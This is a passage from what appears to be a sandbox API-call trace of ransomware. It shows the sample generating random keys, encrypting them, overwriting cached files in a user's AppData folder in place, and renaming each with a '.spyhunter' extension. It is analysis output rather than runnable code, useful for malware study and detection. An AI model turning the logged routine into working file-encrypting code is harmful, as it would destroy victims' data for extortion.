[0152.134] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed08*=0x30) returned 1 [0152.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 152 [0152.166] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0152.166] GetProcessHeap () returned 0x2c0000 [0152.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.166] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eccc*=0x166, lpOverlapped=0x0) returned 1 [0152.167] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.167] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x166, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eccc*=0x166, lpOverlapped=0x0) returned 1 [0152.167] GetProcessHeap () returned 0x2c0000 [0152.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.167] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.171] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x57ed0c*, lpNumberOfBytesWritten=0x57eccc*=0x4, lpOverlapped=0x0) returned 1 [0152.171] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eccc*=0x30, lpOverlapped=0x0) returned 1 [0152.171] CloseHandle (hObject=0xb0) returned 1 [0152.171] GetProcessHeap () returned 0x2c0000 [0152.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.171] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.spyhunter") returned 162 [0152.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.spyhunter")) returned 1 [0152.176] GetProcessHeap () returned 0x2c0000 [0152.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.176] GetProcessHeap () returned 0x2c0000 [0152.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.176] GetProcessHeap () returned 0x2c0000 [0152.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22f28 | out: hHeap=0x2c0000) returned 1 [0152.176] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed08 | out: pbBuffer=0x57ed08) returned 1 [0152.176] GetProcessHeap () returned 0x2c0000 [0152.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.176] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed00*=0x30) returned 1 [0152.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0152.177] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0152.177] GetProcessHeap () returned 0x2c0000 [0152.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.178] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecc4*=0x64b, lpOverlapped=0x0) returned 1 [0152.241] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.241] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x64b, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecc4*=0x64b, lpOverlapped=0x0) returned 1 [0152.241] GetProcessHeap () returned 0x2c0000 [0152.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.241] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.242] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x57ed04*, lpNumberOfBytesWritten=0x57ecc4*=0x4, lpOverlapped=0x0) returned 1 [0152.242] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecc4*=0x30, lpOverlapped=0x0) returned 1 [0152.242] CloseHandle (hObject=0xb0) returned 1 [0152.242] GetProcessHeap () returned 0x2c0000 [0152.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.242] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.spyhunter") returned 161 [0152.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.spyhunter")) returned 1 [0152.243] GetProcessHeap () returned 0x2c0000 [0152.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.243] GetProcessHeap () returned 0x2c0000 [0152.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.243] GetProcessHeap () returned 0x2c0000 [0152.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7958 | out: hHeap=0x2c0000) returned 1 [0152.244] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed08 | out: pbBuffer=0x57ed08) returned 1 [0152.244] GetProcessHeap () returned 0x2c0000 [0152.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.244] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed00*=0x30) returned 1 [0152.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.244] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0152.245] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0152.245] GetProcessHeap () returned 0x2c0000 [0152.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.245] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecc4*=0x5ae, lpOverlapped=0x0) returned 1 [0152.264] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.264] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecc4*=0x5ae, lpOverlapped=0x0) returned 1 [0152.264] GetProcessHeap () returned 0x2c0000 [0152.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.264] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.264] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x57ed04*, lpNumberOfBytesWritten=0x57ecc4*=0x4, lpOverlapped=0x0) returned 1 [0152.264] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecc4*=0x30, lpOverlapped=0x0) returned 1 [0152.265] CloseHandle (hObject=0xb0) returned 1 [0152.265] GetProcessHeap () returned 0x2c0000 [0152.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.265] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.spyhunter") returned 161 [0152.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.spyhunter")) returned 1 [0152.266] GetProcessHeap () returned 0x2c0000 [0152.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.266] GetProcessHeap () returned 0x2c0000 [0152.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.266] GetProcessHeap () returned 0x2c0000 [0152.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe74f0 | out: hHeap=0x2c0000) returned 1 [0152.266] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed00 | out: pbBuffer=0x57ed00) returned 1 [0152.266] GetProcessHeap () returned 0x2c0000 [0152.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.266] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecf8*=0x30) returned 1 [0152.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0152.267] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0152.267] GetProcessHeap () returned 0x2c0000 [0152.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.267] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecbc*=0x5ed, lpOverlapped=0x0) returned 1 [0152.274] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.274] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecbc*=0x5ed, lpOverlapped=0x0) returned 1 [0152.274] GetProcessHeap () returned 0x2c0000 [0152.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.274] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.274] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x57ecfc*, lpNumberOfBytesWritten=0x57ecbc*=0x4, lpOverlapped=0x0) returned 1 [0152.275] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecbc*=0x30, lpOverlapped=0x0) returned 1 [0152.275] CloseHandle (hObject=0xb0) returned 1 [0152.275] GetProcessHeap () returned 0x2c0000 [0152.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.275] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.spyhunter") returned 161 [0152.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.spyhunter")) returned 1 [0152.276] GetProcessHeap () returned 0x2c0000 [0152.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.276] GetProcessHeap () returned 0x2c0000 [0152.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.276] GetProcessHeap () returned 0x2c0000 [0152.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6f10 | out: hHeap=0x2c0000) returned 1 [0152.276] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed00 | out: pbBuffer=0x57ed00) returned 1 [0152.276] GetProcessHeap () returned 0x2c0000 [0152.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.276] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecf8*=0x30) returned 1 [0152.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0152.278] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0152.278] GetProcessHeap () returned 0x2c0000 [0152.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.278] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecbc*=0x652, lpOverlapped=0x0) returned 1 [0152.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.281] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecbc*=0x652, lpOverlapped=0x0) returned 1 [0152.281] GetProcessHeap () returned 0x2c0000 [0152.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.282] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x57ecfc*, lpNumberOfBytesWritten=0x57ecbc*=0x4, lpOverlapped=0x0) returned 1 [0152.282] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecbc*=0x30, lpOverlapped=0x0) returned 1 [0152.282] CloseHandle (hObject=0xb0) returned 1 [0152.282] GetProcessHeap () returned 0x2c0000 [0152.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.282] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.spyhunter") returned 161 [0152.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.spyhunter")) returned 1 [0152.283] GetProcessHeap () returned 0x2c0000 [0152.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.283] GetProcessHeap () returned 0x2c0000 [0152.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.283] GetProcessHeap () returned 0x2c0000 [0152.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6c20 | out: hHeap=0x2c0000) returned 1 [0152.284] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecf8 | out: pbBuffer=0x57ecf8) returned 1 [0152.284] GetProcessHeap () returned 0x2c0000 [0152.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.284] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecf0*=0x30) returned 1 [0152.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.285] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 